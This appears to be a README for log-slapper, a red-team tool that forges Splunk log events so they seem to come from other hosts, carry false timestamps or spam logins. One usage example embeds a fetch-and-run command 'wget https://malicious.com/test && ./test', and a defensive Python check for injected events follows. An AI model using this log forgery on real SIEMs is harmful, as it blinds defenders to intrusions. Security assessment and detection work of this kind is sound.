log-slapper is an open-source offensive security tool designed for red-team operations as a post-exploitation module and for assessing your Splunk deployment's security.

oz9un/log-slapper

log-slapper 👹


Every company undoubtedly trusts its SIEM, right? Think twice: we can inject fake logs, distract blue teams and hide our attacks.

description

log-slapper is an offensive security tool for red-teamers, designed specifically for the post-exploitation part of a campaign.

log-slapper can:

  • mimic attacks on behalf of any other computer on the network
  • run in interactive mode: Target Shell Playzone
  • send logs from the future and the past: HEC-based Time Traveller's attack
  • perform built-in attacks like login success/fail spam, new process creations

usage

go into interactive mode:

./log-slapper interactive

send a log claiming that "payment-server-01" got hacked and malicious code is running:

./log-slapper nix_command --hostname "payment-server-01" --ip "23.32.45.123" -t "e270e632-861f-45cc-8f00-f91eb895f5e6" --exectime "10/10/2021 08:45" --command "wget https://malicious.com/test && ./test"

Now check your Splunk 🙂
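A defender-side check for the two behaviours listed above (events sent on behalf of another host, and events dated in the past or future), as an added example that is not part of the log-slapper project. It assumes a reverse proxy in front of the HEC endpoint records each request's peer address and receive time; the inventory, thresholds and sample records are constructed.

```python
import json
from datetime import datetime, timezone

# Assumed tolerances; tune them to the normal delivery lag of your senders.
MAX_PAST_LAG_S = 15 * 60     # event may be at most 15 min older than its receive time
MAX_FUTURE_SKEW_S = 2 * 60   # event may be at most 2 min ahead of its receive time
# Constructed inventory: network peer address -> the hostname allowed to report from it.
INVENTORY = {"10.0.5.20": "payment-server-01", "10.0.7.31": "hr-laptop-17"}

def ts(text):
    """Convert a UTC 'YYYY-MM-DD HH:MM' string to epoch seconds."""
    return datetime.strptime(text, "%Y-%m-%d %H:%M").replace(tzinfo=timezone.utc).timestamp()

def check_event(peer_ip, received_at, body, inventory=INVENTORY):
    """Return the reasons a HEC JSON event looks injected (empty list = clean)."""
    evt = json.loads(body)
    reasons = []
    claimed_time = evt.get("time")  # sender-controlled; optional in HEC JSON
    if claimed_time is not None:
        lag = received_at - float(claimed_time)
        if lag > MAX_PAST_LAG_S:
            reasons.append("backdated")
        elif lag < -MAX_FUTURE_SKEW_S:
            reasons.append("future-dated")
    expected = inventory.get(peer_ip)  # peer address comes from the proxy, not the payload
    if expected is None:
        reasons.append("unknown-sender")
    elif evt.get("host") not in (None, expected):
        reasons.append("host-mismatch")
    return reasons

# Constructed sample: (id, peer address, receive time, HEC JSON body).
NOW = ts("2024-03-01 09:00")
SAMPLE = [
    ("a", "10.0.5.20", NOW, json.dumps({"time": NOW - 30, "host": "payment-server-01", "event": "constructed"})),
    ("b", "10.0.7.31", NOW, json.dumps({"time": ts("2021-10-10 08:45"), "host": "payment-server-01", "event": "constructed"})),
    ("c", "10.0.7.31", NOW, json.dumps({"time": NOW + 86400, "host": "hr-laptop-17", "event": "constructed"})),
]

def triage(records):
    """Map record id -> reasons, for flagged records only."""
    flagged = {}
    for rid, peer, received, body in records:
        reasons = check_event(peer, received, body)
        if reasons:
            flagged[rid] = reasons
    return flagged

if __name__ == "__main__":
    print(triage(SAMPLE))
```

Inside Splunk the same time comparison can be made between the built-in `_time` and `_indextime` fields.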

video

for more details on research, usage of log-slapper and more:
SIEM SLAM
